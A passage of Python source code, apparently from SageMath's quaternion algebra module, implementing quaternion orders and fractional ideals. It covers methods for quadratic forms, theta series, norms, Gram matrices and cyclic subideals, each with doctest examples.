- ``gens`` -- a list of elements of this quaternion order
- ``check`` -- bool (default: ``True``); if ``False``, then ``gens`` must
4-tuple that forms a Hermite basis for an ideal
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.right_ideal([2*a for a in R.basis()])
Fractional ideal (1 + i, 2*i, j + k, 2*k)
"""
if self.base_ring() == ZZ:
return QuaternionFractionalIdeal_rational(gens, right_order=self, check=check)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
def unit_ideal(self):
"""
Return the unit ideal in this quaternion order.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: I = R.unit_ideal(); I
Fractional ideal (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
if self.base_ring() == ZZ:
return QuaternionFractionalIdeal_rational(self.basis(), left_order=self, right_order=self, check=False)
else:
raise NotImplementedError("ideal only implemented for quaternion algebras over QQ")
def quadratic_form(self):
"""
Return the normalized quadratic form associated to this quaternion order.
OUTPUT: quadratic form
EXAMPLES::
sage: R = BrandtModule(11,13).order_of_level_N()
sage: Q = R.quadratic_form(); Q
Quadratic form in 4 variables over Rational Field with coefficients:
[ 14 253 55 286 ]
[ * 1455 506 3289 ]
[ * * 55 572 ]
[ * * * 1859 ]
sage: Q.theta_series(10)
1 + 2*q + 2*q^4 + 4*q^6 + 4*q^8 + 2*q^9 + O(q^10)
"""
return self.unit_ideal().quadratic_form()
def ternary_quadratic_form(self, include_basis=False):
"""
Return the ternary quadratic form associated to this order.
INPUT:
- ``include_basis`` -- bool (default: False), if True also
return a basis for the dimension 3 subspace `G`
OUTPUT:
- QuadraticForm
- optional basis for dimension 3 subspace
This function computes the positive definition quadratic form
obtained by letting G be the trace zero subspace of `\ZZ` +
2* ``self``, which has rank 3, and restricting the pairing::
(x,y) = (x.conjugate()*y).reduced_trace()
to `G`.
APPLICATIONS: Ternary quadratic forms associated to an order
in a rational quaternion algebra are useful in computing with
Gross points, in decided whether quaternion orders have
embeddings from orders in quadratic imaginary fields, and in
computing elements of the Kohnen plus subspace of modular
forms of weight 3/2.
EXAMPLES::
sage: R = BrandtModule(11,13).order_of_level_N()
sage: Q = R.ternary_quadratic_form(); Q
Quadratic form in 3 variables over Rational Field with coefficients:
[ 5820 1012 13156 ]
[ * 55 1144 ]
[ * * 7436 ]
sage: factor(Q.disc())
2^4 * 11^2 * 13^2
The following theta series is a modular form of weight 3/2 and level 4*11*13::
sage: Q.theta_series(100)
1 + 2*q^23 + 2*q^55 + 2*q^56 + 2*q^75 + 4*q^92 + O(q^100)
"""
if self.base_ring() != ZZ:
raise NotImplementedError("ternary quadratic form of order only implemented for quaternion algebras over QQ")
Q = self.quaternion_algebra()
# 2*R + ZZ
twoR = self.free_module().scale(2)
A = twoR.ambient_module()
Z = twoR.span( [Q(1).coefficient_tuple()], ZZ)
S = twoR + Z
# Now we intersect with the trace 0 submodule
v = [b.reduced_trace() for b in Q.basis()]
M = matrix(QQ,4,1,v)
tr0 = M.kernel()
G = tr0.intersection(S)
B = [Q(a) for a in G.basis()]
m = matrix(QQ,[[x.pair(y) for x in B] for y in B])
from sage.quadratic_forms.quadratic_form import QuadraticForm
Q = QuadraticForm(m)
if include_basis:
return Q, B
else:
return Q
class QuaternionFractionalIdeal(Ideal_fractional):
def __hash__(self):
r"""
Stupid constant hash function!
TESTS::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: hash(R.right_ideal(R.basis()))
0
"""
return 0
class QuaternionFractionalIdeal_rational(QuaternionFractionalIdeal):
"""
A fractional ideal in a rational quaternion algebra.
INPUT:
- ``left_order`` -- a quaternion order or ``None``
- ``right_order`` -- a quaternion order or ``None``
- ``basis`` -- tuple of length 4 of elements in of ambient
quaternion algebra whose `\\ZZ`-span is an ideal
- ``check`` -- bool (default: ``True``); if ``False``, do no type
checking, and the input basis *must* be in Hermite form.
"""
def __init__(self, basis, left_order=None, right_order=None, check=True):
"""
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.right_ideal(R.basis())
Fractional ideal (1/2 + 1/2*i, i, 1/2*j + 1/2*k, k)
sage: R.right_ideal(tuple(R.basis()), check=False)
Fractional ideal (1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
if check:
if left_order is not None and not isinstance(left_order, QuaternionOrder):
raise TypeError("left_order must be a quaternion order or None")
if right_order is not None and not isinstance(right_order, QuaternionOrder):
raise TypeError("right_order must be a quaternion order or None")
if not isinstance(basis, (list, tuple)):
raise TypeError("basis must be a list or tuple")
self.__left_order = left_order
self.__right_order = right_order
if check:
try:
Q = self.quaternion_order().quaternion_algebra()
except RuntimeError:
Q = basis[0].parent()
basis = tuple([Q(v) for v in
(QQ**4).span([Q(v).coefficient_tuple() for v in basis], ZZ).basis()])
self.__basis = basis
def scale(self, alpha, left=False):
r"""
Scale the fractional ideal ``self`` by multiplying the basis
by ``alpha``.
INPUT:
- `\alpha` -- element of quaternion algebra
- ``left`` -- bool (default: False); if true multiply
`\alpha` on the left, otherwise multiply `\alpha` on the right
OUTPUT:
- a new fractional ideal
EXAMPLES::
sage: B = BrandtModule(5,37); I = B.right_ideals()[0]; i,j,k = B.quaternion_algebra().gens(); I
Fractional ideal (2 + 2*j + 106*k, i + 2*j + 105*k, 4*j + 64*k, 148*k)
sage: I.scale(i)
Fractional ideal [2*i + 212*j - 2*k, -2 + 210*j - 2*k, 128*j - 4*k, 296*j]
sage: I.scale(i, left=True)
Fractional ideal [2*i - 212*j + 2*k, -2 - 210*j + 2*k, -128*j + 4*k, -296*j]
sage: I.scale(i, left=False)
Fractional ideal [2*i + 212*j - 2*k, -2 + 210*j - 2*k, 128*j - 4*k, 296*j]
sage: i * I.gens()[0]
2*i - 212*j + 2*k
sage: I.gens()[0] * i
2*i + 212*j - 2*k
"""
Q = self.quaternion_algebra()
alpha = Q(alpha)
if left:
gens = [alpha*b for b in self.basis()]
else:
gens = [b*alpha for b in self.basis()]
return Q.ideal(gens, left_order = self.__left_order,
right_order = self.__right_order, check=False)
def quaternion_algebra(self):
"""
Return the ambient quaternion algebra that contains this fractional ideal.
OUTPUT: a quaternion algebra
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I.quaternion_algebra()
Quaternion Algebra (-1, -3) with base ring Rational Field
"""
try: return self.__quaternion_algebra
except AttributeError: pass
A = self.__basis[0].parent()
self.__quaternion_algebra = A
return A
def _compute_order(self, side='left'):
r"""
Used internally to compute either the left or right order
associated to an ideal in a quaternion algebra. If
action='right', compute the left order, and if action='left'
compute the right order.
INPUT:
- ``side`` -- 'left' or 'right'
EXAMPLES::
sage: R.<i,j,k> = QuaternionAlgebra(-1,-11)
sage: I = R.ideal([2 + 2*j + 140*k, 2*i + 4*j + 150*k, 8*j + 104*k, 152*k])
sage: Ol = I._compute_order('left'); Ol
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j + 35*k, 1/4*i + 1/2*j + 75/4*k, j + 32*k, 38*k)
sage: Or = I._compute_order('right'); Or
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j + 16*k, 1/2*i + 11/2*k, j + 13*k, 19*k)
sage: Ol.discriminant()
209
sage: Or.discriminant()
209
sage: I.left_order() == Ol
True
sage: I.right_order() == Or
True
ALGORITHM: Let `b_1, b_2, b_3, b_3` be a basis for this
fractional ideal `I`, and assume we want to compute the left
order of `I` in the quaternion algebra `Q`. Then
multiplication by `b_i` on the right defines a map `B_i:Q \to
Q`. We have
.. MATH::
R = B_1^{-1}(I) \cap B_2^{-1}(I) \cap B_3^{-1}(I)\cap B_4^{-1}(I).
This is because
.. MATH::
B_n^{-1}(I) = \{\alpha \in Q : \alpha b_n \in I \},
and
.. MATH::
R = \{\alpha \in Q : \alpha b_n \in I, n=1,2,3,4\}.
"""
if side == 'left':
action = 'right'
elif side == 'right':
action = 'left'
else:
raise ValueError("side must be 'left' or 'right'")
Q = self.quaternion_algebra()
if Q.base_ring() != QQ:
raise NotImplementedError("computation of left and right orders only implemented over QQ")
M = [(~b).matrix(action=action) for b in self.basis()]
B = self.basis_matrix()
invs = [B*m for m in M]
# Now intersect the row spans of each matrix in invs
ISB = [Q(v) for v in intersection_of_row_modules_over_ZZ(invs).row_module(ZZ).basis()]
return Q.quaternion_order(ISB)
def left_order(self):
"""
Return the left order associated to this fractional ideal.
OUTPUT: an order in a quaternion algebra
EXAMPLES::
sage: B = BrandtModule(11)
sage: R = B.maximal_order()
sage: I = R.unit_ideal()
sage: I.left_order()
Order of Quaternion Algebra (-1, -11) with base ring Rational Field with basis (1/2 + 1/2*j, 1/2*i + 1/2*k, j, k)
We do a consistency check::
sage: B = BrandtModule(11,19); R = B.right_ideals()
sage: [r.left_order().discriminant() for r in R]
[209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209, 209]
"""
if self.__left_order is None:
self.__left_order = self._compute_order(side='left')
return self.__left_order
def right_order(self):
"""
Return the right order associated to this fractional ideal.
OUTPUT: an order in a quaternion algebra
EXAMPLES::
sage: I = BrandtModule(389).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 2*k, i + 2*j + k, 8*j, 8*k)
sage: I.right_order()
Order of Quaternion Algebra (-2, -389) with base ring Rational Field with basis (1/2 + 1/2*j + 1/2*k, 1/4*i + 1/2*j + 1/4*k, j, k)
sage: I.left_order()
Order of Quaternion Algebra (-2, -389) with base ring Rational Field with basis (1/2 + 1/2*j + 3/2*k, 1/8*i + 1/4*j + 9/8*k, j + k, 2*k)
The following is a big consistency check. We take reps for
all the right ideal classes of a certain order, take the
corresponding left orders, then take ideals in the left orders
and from those compute the right order again::
sage: B = BrandtModule(11,19); R = B.right_ideals()
sage: O = [r.left_order() for r in R]
sage: J = [O[i].left_ideal(R[i].basis()) for i in range(len(R))]
sage: len(set(J))
18
sage: len(set([I.right_order() for I in J]))
1
sage: J[0].right_order() == B.order_of_level_N()
True
"""
if self.__right_order is None:
self.__right_order = self._compute_order(side='right')
return self.__right_order
def __repr__(self):
"""
Return string representation of this quaternion fractional ideal.
EXAMPLES::
sage: I = BrandtModule(11).right_ideals()[1]
sage: type(I)
<class 'sage.algebras.quatalg.quaternion_algebra.QuaternionFractionalIdeal_rational'>
sage: I.__repr__()
'Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 2*k, 8*j, 8*k)'
"""
return 'Fractional ideal %s'%(self.gens(),)
def quaternion_order(self):
"""
Return the order for which this ideal is a left or right
fractional ideal. If this ideal has both a left and right
ideal structure, then the left order is returned. If it has
neither structure, then an error is raised.
OUTPUT: QuaternionOrder
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.unit_ideal().quaternion_order() is R
True
"""
try: return self.__quaternion_order
except AttributeError: pass
if self.__left_order is not None:
A = self.__left_order
elif self.__right_order is not None:
A = self.__right_order
else:
raise RuntimeError("unable to determine quaternion order of ideal without known order")
self.__quaternion_order = A
return A
def ring(self):
"""
Return ring that this is a fractional ideal for.
EXAMPLES::
sage: R = QuaternionAlgebra(-11,-1).maximal_order()
sage: R.unit_ideal().ring() is R
True
"""
return self.quaternion_order()
def basis(self):
"""
Return basis for this fractional ideal. The basis is in Hermite form.
OUTPUT: tuple
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().basis()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return self.__basis
def gens(self):
"""
Return the generators for this ideal, which are the same as
the `\\ZZ`-basis for this ideal.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().gens()
(1/2 + 1/2*i, 1/2*j - 1/2*k, i, -k)
"""
return self.__basis
def __cmp__(self, right):
"""
Compare this fractional quaternion ideal to ``right``. If
``right`` is not a fractional quaternion ideal a TypeError is
raised. If the fractional ideals are in different ambient
quaternion algebras, then the quaternion algebras themselves
are compared.
INPUT:
- ``right`` - another fractional quaternion ideal
EXAMPLES::
sage: I = QuaternionAlgebra(-11,-1).maximal_order().unit_ideal()
sage: I == I # indirect doctest
True
sage: I == 5
False
"""
if not isinstance(right, QuaternionFractionalIdeal_rational):
raise TypeError
return cmp(self.__basis, right.__basis)
def basis_matrix(self):
r"""
Return basis matrix `M` in Hermite normal form for self as a
matrix with rational entries.
If `Q` is the ambient quaternion algebra, then the `\ZZ`-span of
the rows of `M` viewed as linear combinations of Q.basis() =
`[1,i,j,k]` is the fractional ideal self. Also,
``M * M.denominator()`` is an integer matrix in Hermite normal form.
OUTPUT: matrix over `\QQ`
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().basis_matrix()
[ 1/2 1/2 0 0]
[ 0 0 1/2 -1/2]
[ 0 1 0 0]
[ 0 0 0 -1]
"""
try: return self.__hermite_basis_matrix
except AttributeError: pass
B = quaternion_algebra_cython.rational_matrix_from_rational_quaternions(self.__basis)
self.__hermite_basis_matrix = B
return B
def free_module(self):
r"""
Return the free module associated to this quaternionic
fractional ideal, viewed as a submodule of
``Q.free_module()``, where ``Q`` is the ambient quaternion
algebra.
OUTPUT:
Free `\ZZ`-module of rank 4 embedded in an ambient `\QQ^4`.
EXAMPLES::
sage: QuaternionAlgebra(-11,-1).maximal_order().unit_ideal().basis_matrix()
[ 1/2 1/2 0 0]
[ 0 0 1/2 -1/2]
[ 0 1 0 0]
[ 0 0 0 -1]
This shows that the issue at :trac:`6760` is fixed::
sage: R.<i,j,k> = QuaternionAlgebra(-1, -13)
sage: I = R.ideal([2+i, 3*i, 5*j, j+k]); I
Fractional ideal (2 + i, 3*i, j + k, 5*k)
sage: I.free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[2 1 0 0]
[0 3 0 0]
[0 0 1 1]
[0 0 0 5]
"""
try: return self.__free_module
except AttributeError:
M = self.basis_matrix().row_module(ZZ)
self.__free_module = M
return M
def theta_series_vector(self, B):
r"""
Return theta series coefficients of ``self``, as a vector
of ``B`` integers.
INPUT:
- ``B`` -- positive integer
OUTPUT:
Vector over `\ZZ` with ``B`` entries.
EXAMPLES::
sage: I = BrandtModule(37).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 2*k, i + 2*j + k, 8*j, 8*k)
sage: I.theta_series_vector(5)
(1, 0, 2, 2, 6)
sage: I.theta_series_vector(10)
(1, 0, 2, 2, 6, 4, 8, 6, 10, 10)
sage: I.theta_series_vector(5)
(1, 0, 2, 2, 6)
"""
B = Integer(B)
try:
if len(self.__theta_series_vector)>= B: return self.__theta_series_vector[:B]
except AttributeError: pass
V = FreeModule(ZZ, B)
Q = self.quadratic_form()
v = V(Q.representation_number_list(B))
self.__theta_series_vector = v
return v
def quadratic_form(self):
"""
Return the normalized quadratic form associated to this quaternion ideal.
OUTPUT: quadratic form
EXAMPLES::
sage: I = BrandtModule(11).right_ideals()[1]
sage: Q = I.quadratic_form(); Q
Quadratic form in 4 variables over Rational Field with coefficients:
[ 18 22 33 22 ]
[ * 7 22 11 ]
[ * * 22 0 ]
[ * * * 22 ]
sage: Q.theta_series(10)
1 + 12*q^2 + 12*q^3 + 12*q^4 + 12*q^5 + 24*q^6 + 24*q^7 + 36*q^8 + 36*q^9 + O(q^10)
sage: I.theta_series(10)
1 + 12*q^2 + 12*q^3 + 12*q^4 + 12*q^5 + 24*q^6 + 24*q^7 + 36*q^8 + 36*q^9 + O(q^10)
"""
try: return self.__quadratic_form
except AttributeError: pass
from sage.quadratic_forms.quadratic_form import QuadraticForm
# first get the gram matrix
gram_matrix = self.gram_matrix()
# rescale so that there are no denominators
gram_matrix, _ = gram_matrix._clear_denom()
# Make sure gcd of all entries is 1.
g = gram_matrix.gcd()
if g != 1:
gram_matrix = gram_matrix / g
# now get the quadratic form
Q = QuadraticForm(gram_matrix)
self.__quadratic_form = Q
return Q
def theta_series(self, B, var='q'):
r"""
Return normalized theta series of self, as a power series over
`\ZZ` in the variable ``var``, which is 'q' by default.
The normalized theta series is by definition
.. MATH::
\theta_I(q) = \sum_{x \in I} q^{\frac{N(x)}{N(I)}}.
INPUT:
- ``B`` -- positive integer
- ``var`` -- string (default: 'q')
OUTPUT: power series
EXAMPLES::
sage: I = BrandtModule(11).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 2*k, 8*j, 8*k)
sage: I.norm()
32
sage: I.theta_series(5)
1 + 12*q^2 + 12*q^3 + 12*q^4 + O(q^5)
sage: I.theta_series(5,'T')
1 + 12*T^2 + 12*T^3 + 12*T^4 + O(T^5)
sage: I.theta_series(3)
1 + 12*q^2 + O(q^3)
"""
try:
if self.__theta_series.prec() >= B:
if var == self.__theta_series.variable():
return self.__theta_series.add_bigoh(B)
else:
ZZ[[var]](self.__theta_series.list()[:B+1])
except AttributeError: pass
v = self.theta_series_vector(B)
theta = ZZ[[var]](v.list()).add_bigoh(B)
self.__theta_series = theta
return theta
def gram_matrix(self):
r"""
Return the Gram matrix of this fractional ideal.
OUTPUT: `4 \times 4` matrix over `\QQ`.
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I.gram_matrix()
[ 640 1920 2112 1920]
[ 1920 14080 13440 16320]
[ 2112 13440 13056 15360]
[ 1920 16320 15360 19200]
"""
try: return self.__gram_matrix
except AttributeError: pass
M = []
A = self.__basis
B = [z.conjugate() for z in self.__basis]
two = QQ(2)
m = [two*(a*b).reduced_trace() for b in B for a in A]
M44 = MatrixSpace(QQ, 4)
G = M44(m,coerce=False)
self.__gram_matrix = G
return G
def norm(self):
"""
Return the reduced norm of this fractional ideal.
OUTPUT: rational number
EXAMPLES::
sage: M = BrandtModule(37)
sage: C = M.right_ideals()
sage: [I.norm() for I in C]
[16, 32, 32]
sage: (a,b) = M.quaternion_algebra().invariants() # optional - magma
sage: magma.eval('A<i,j,k> := QuaternionAlgebra<Rationals() | %s, %s>' % (a,b)) # optional - magma
''
sage: magma.eval('O := QuaternionOrder(%s)' % str(list(C[0].right_order().basis()))) # optional - magma
''
sage: [ magma('rideal<O | %s>' % str(list(I.basis()))).Norm() for I in C] # optional - magma
[16, 32, 32]
sage: A.<i,j,k> = QuaternionAlgebra(-1,-1)
sage: R = A.ideal([i,j,k,1/2 + 1/2*i + 1/2*j + 1/2*k]) # this is actually an order, so has reduced norm 1
sage: R.norm()
1
sage: [ J.norm() for J in R.cyclic_right_subideals(3) ] # enumerate maximal right R-ideals of reduced norm 3, verify their norms
[3, 3, 3, 3]
"""
G = self.gram_matrix() / QQ(2)
r = G.det().abs()
assert r.is_square(), "first is bad!"
r = r.sqrt()
# If we know either the left- or the right order, use that one to compute the norm.
# Otherwise quaternion_order() will raise a RuntimeError and we compute the left order
try:
R = self.quaternion_order()
except RuntimeError:
R = self.left_order()
r/= R.discriminant()
assert r.is_square(), "second is bad!"
return r.sqrt()
def conjugate(self):
"""
Return the ideal with generators the conjugates of the generators for self.
OUTPUT: a quaternionic fractional ideal
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I.conjugate()
Fractional ideal (2 + 2*j + 28*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
"""
return self.quaternion_algebra().ideal([b.conjugate() for b in self.basis()],
left_order=self.__right_order,
right_order=self.__left_order)
def __mul__(self, right):
"""
Return the product of the fractional ideals ``self`` and ``right``.
.. note::
We do not keep track of left or right order structure.
EXAMPLES::
sage: I = BrandtModule(3,5).right_ideals()[1]; I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
sage: I*I
Fractional ideal (8 + 24*j + 16*k, 8*i + 16*j + 136*k, 32*j + 128*k, 160*k)
sage: I*I.conjugate()
Fractional ideal (16 + 16*j + 224*k, 8*i + 16*j + 136*k, 32*j + 128*k, 320*k)
sage: I.multiply_by_conjugate(I)
Fractional ideal (16 + 16*j + 224*k, 8*i + 16*j + 136*k, 32*j + 128*k, 320*k)
"""
if not isinstance(right, QuaternionFractionalIdeal_rational):
return self._scale(right, left=False)
gens = [a*b for a in self.basis() for b in right.basis()]
#if self.__right_order == right.__left_order:
# left_order = self.__left_order
# right_order = right.__right_order
basis = tuple(basis_for_quaternion_lattice(gens))
A = self.quaternion_algebra()
return A.ideal(basis, check=False)
@cached_method
def free_module(self):
r"""
Return the underlying free `\ZZ`-module corresponding to this ideal.
EXAMPLES::
sage: X = BrandtModule(3,5).right_ideals()
sage: X[0]
Fractional ideal (2 + 2*j + 8*k, 2*i + 18*k, 4*j + 16*k, 20*k)
sage: X[0].free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[ 2 0 2 8]
[ 0 2 0 18]
[ 0 0 4 16]
[ 0 0 0 20]
sage: X[0].scale(1/7).free_module()
Free module of degree 4 and rank 4 over Integer Ring
Echelon basis matrix:
[ 2/7 0 2/7 8/7]
[ 0 2/7 0 18/7]
[ 0 0 4/7 16/7]
[ 0 0 0 20/7]
The free module method is also useful since it allows for checking if
one ideal is contained in another, computing quotients `I/J`, etc.::
sage: X = BrandtModule(3,17).right_ideals()
sage: I = X[0].intersection(X[2]); I
Fractional ideal (2 + 2*j + 164*k, 2*i + 4*j + 46*k, 16*j + 224*k, 272*k)
sage: I.free_module().is_submodule(X[3].free_module())
False
sage: I.free_module().is_submodule(X[1].free_module())
True
sage: X[0].free_module() / I.free_module()
Finitely generated module V/W over Integer Ring with invariants (4, 4)
"""
return self.basis_matrix().row_module(ZZ)
def intersection(self, J):
"""
Return the intersection of the ideals self and `J`.
EXAMPLES::
sage: X = BrandtModule(3,5).right_ideals()
sage: I = X[0].intersection(X[1]); I
Fractional ideal (2 + 6*j + 4*k, 2*i + 4*j + 34*k, 8*j + 32*k, 40*k)
"""
V = self.free_module().intersection(J.free_module())
H,d = V.basis_matrix()._clear_denom()
A = self.quaternion_algebra()
gens = quaternion_algebra_cython.rational_quaternions_from_integral_matrix_and_denom(A, H, d)
return A.ideal(gens)
def multiply_by_conjugate(self, J):
"""
Return product of self and the conjugate Jbar of `J`.
INPUT:
- ``J`` -- a quaternion ideal.
OUTPUT: a quaternionic fractional ideal.
EXAMPLES::
sage: R = BrandtModule(3,5).right_ideals()
sage: R[0].multiply_by_conjugate(R[1])
Fractional ideal (8 + 8*j + 112*k, 8*i + 16*j + 136*k, 32*j + 128*k, 160*k)
sage: R[0]*R[1].conjugate()
Fractional ideal (8 + 8*j + 112*k, 8*i + 16*j + 136*k, 32*j + 128*k, 160*k)
"""
Jbar = [b.conjugate() for b in J.basis()]
gens = [a*b for a in self.basis() for b in Jbar]
basis = tuple(basis_for_quaternion_lattice(gens))
R = self.quaternion_algebra()
return R.ideal(basis, check=False)
def is_equivalent(I, J, B=10):
"""
Return ``True`` if ``I`` and ``J`` are equivalent as right ideals.
INPUT:
- ``I`` -- a fractional quaternion ideal (self)
- ``J`` -- a fractional quaternion ideal with same order as ``I``
- ``B`` -- a bound to compute and compare theta series before
doing the full equivalence test
OUTPUT: bool
EXAMPLES::
sage: R = BrandtModule(3,5).right_ideals(); len(R)
2
sage: R[0].is_equivalent(R[1])
False
sage: R[0].is_equivalent(R[0])
True
sage: OO = R[0].quaternion_order()
sage: S = OO.right_ideal([3*a for a in R[0].basis()])
sage: R[0].is_equivalent(S)
True
"""
if not isinstance(I, QuaternionFractionalIdeal_rational):
return False
if I.right_order() != J.right_order():
raise ValueError("I and J must be right ideals")
# Just test theta series first. If the theta series are
# different, the ideals are definitely not equivalent.
if B > 0 and I.theta_series_vector(B) != J.theta_series_vector(B):
return False
# The theta series are the same, so perhaps the ideals are
# equivalent. We use Prop 1.18 of [Pizer, 1980] to decide.
# 1. Compute I * Jbar
# see Prop. 1.17 in Pizer. Note that we use IJbar instead of
# JbarI since we work with right ideals
IJbar = I.multiply_by_conjugate(J)
# 2. Determine if there is alpha in K such
# that N(alpha) = N(I)*N(J) as explained by Pizer.
c = IJbar.theta_series_vector(2)[1]
return c != 0
def __contains__(self, x):
"""
Returns whether x is in self.
EXAMPLES::
sage: R.<i,j,k> = QuaternionAlgebra(-3, -13)
sage: I = R.ideal([2+i, 3*i, 5*j, j+k])
sage: 2+i in I
True
sage: 2+i+j+k in I
True
sage: 1+i in I
False
sage: 101*j + k in I
True
"""
try:
x = self.quaternion_algebra()(x)
return self.basis_matrix().transpose().solve_right(vector(x)) in ZZ**4
except (ValueError, TypeError):
return False
@cached_method
def cyclic_right_subideals(self, p, alpha=None):
r"""
Let `I` = ``self``. This function returns the right subideals
`J` of `I` such that `I/J` is an `\GF{p}`-vector space of
dimension 2.
INPUT:
- ``p`` -- prime number (see below)
- ``alpha`` -- (default: ``None``) element of quaternion algebra,
which can be used to parameterize the order of the
ideals `J`. More precisely the `J`'s are the right annihilators
of `(1,0) \alpha^i` for `i=0,1,2,...,p`
OUTPUT:
- list of right ideals
.. NOTE::
Currently, `p` must satisfy a bunch of conditions, or a
``NotImplementedError`` is raised. In particular, `p` must be
odd and unramified in the quaternion algebra, must be
coprime to the index of the right order in the maximal
order, and also coprime to the normal of self. (The Brandt
modules code has a more general algorithm in some cases.)
EXAMPLES::
sage: B = BrandtModule(2,37); I = B.right_ideals()[0]
sage: I.cyclic_right_subideals(3)
[Fractional ideal (2 + 2*i + 10*j + 90*k, 4*i + 4*j + 152*k, 12*j + 132*k, 444*k), Fractional ideal (2 + 2*i + 2*j + 150*k, 4*i + 8*j + 196*k, 12*j + 132*k, 444*k), Fractional ideal (2 + 2*i + 6*j + 194*k, 4*i + 8*j + 344*k, 12*j + 132*k, 444*k), Fractional ideal (2 + 2*i + 6*j + 46*k, 4*i + 4*j + 4*k, 12*j + 132*k, 444*k)]
sage: B = BrandtModule(5,389); I = B.right_ideals()[0]
sage: C = I.cyclic_right_subideals(3); C
[Fractional ideal (2 + 10*j + 546*k, i + 6*j + 133*k, 12*j + 3456*k, 4668*k), Fractional ideal (2 + 2*j + 2910*k, i + 6*j + 3245*k, 12*j + 3456*k, 4668*k), Fractional ideal (2 + i + 2295*k, 3*i + 2*j + 3571*k, 4*j + 2708*k, 4668*k), Fractional ideal (2 + 2*i + 2*j + 4388*k, 3*i + 2*j + 2015*k, 4*j + 4264*k, 4668*k)]
sage: [(I.free_module()/J.free_module()).invariants() for J in C]
[(3, 3), (3, 3), (3, 3), (3, 3)]
sage: I.scale(3).cyclic_right_subideals(3)
[Fractional ideal (6 + 30*j + 1638*k, 3*i + 18*j + 399*k, 36*j + 10368*k, 14004*k), Fractional ideal (6 + 6*j + 8730*k, 3*i + 18*j + 9735*k, 36*j + 10368*k, 14004*k), Fractional ideal (6 + 3*i + 6885*k, 9*i + 6*j + 10713*k, 12*j + 8124*k, 14004*k), Fractional ideal (6 + 6*i + 6*j + 13164*k, 9*i + 6*j + 6045*k, 12*j + 12792*k, 14004*k)]
sage: C = I.scale(1/9).cyclic_right_subideals(3); C
[Fractional ideal (2/9 + 10/9*j + 182/3*k, 1/9*i + 2/3*j + 133/9*k, 4/3*j + 384*k, 1556/3*k), Fractional ideal (2/9 + 2/9*j + 970/3*k, 1/9*i + 2/3*j + 3245/9*k, 4/3*j + 384*k, 1556/3*k), Fractional ideal (2/9 + 1/9*i + 255*k, 1/3*i + 2/9*j + 3571/9*k, 4/9*j + 2708/9*k, 1556/3*k), Fractional ideal (2/9 + 2/9*i + 2/9*j + 4388/9*k, 1/3*i + 2/9*j + 2015/9*k, 4/9*j + 4264/9*k, 1556/3*k)]
sage: [(I.scale(1/9).free_module()/J.free_module()).invariants() for J in C]
[(3, 3), (3, 3), (3, 3), (3, 3)]
sage: Q.<i,j,k> = QuaternionAlgebra(-2,-5)
sage: I = Q.ideal([Q(1),i,j,k])
sage: I.cyclic_right_subideals(3)
[Fractional ideal (1 + 2*j, i + k, 3*j, 3*k), Fractional ideal (1 + j, i + 2*k, 3*j, 3*k), Fractional ideal (1 + 2*i, 3*i, j + 2*k, 3*k), Fractional ideal (1 + i, 3*i, j + k, 3*k)]
The general algorithm is not yet implemented here::
sage: I.cyclic_right_subideals(3)[0].cyclic_right_subideals(3)
Traceback (most recent call last):
...
NotImplementedError: general algorithm not implemented (The given basis vectors must be linearly independent.)
"""
R = self.right_order()
Q = self.quaternion_algebra()
f = Q.modp_splitting_map(p)
if alpha is not None:
alpha = f(alpha)
W = GF(p)**4
try:
A = W.span_of_basis([W(f(a).list()) for a in self.basis()])
scale = 1
IB = self.basis_matrix()
except (ValueError, ZeroDivisionError):
# try rescaling the ideal.
B, d = self.basis_matrix()._clear_denom()
g = gcd(B.list())
IB = B/g
scale = g/d
try:
A = W.span_of_basis([W(f(Q(a.list())).list()) for a in IB.rows()])
except (ValueError, ZeroDivisionError) as msg:
# Here we could replace the ideal by an *equivalent*
# ideal that works. This is always possible.
# However, I haven't implemented that algorithm yet.
raise NotImplementedError("general algorithm not implemented (%s)"%msg)
Ai = A.basis_matrix()**(-1)
AiB = Ai.change_ring(QQ) * IB
# Do not care about the denominator since we're really working in I/p*I.
AiB, _ = AiB._clear_denom()
pB = p*IB
pB, d = pB._clear_denom()
ans = []
Z = matrix(ZZ,2,4)
P1 = P1List(p)
if alpha is None:
lines = P1
else:
x = alpha
lines = []
for i in range(p+1):
lines.append(P1.normalize(x[0,0], x[0,1]))
x *= alpha
for u,v in lines:
# The following does:
# z = matrix(QQ,2,4,[0,-v,0,u, -v,0,u,0],check=False) * AiB
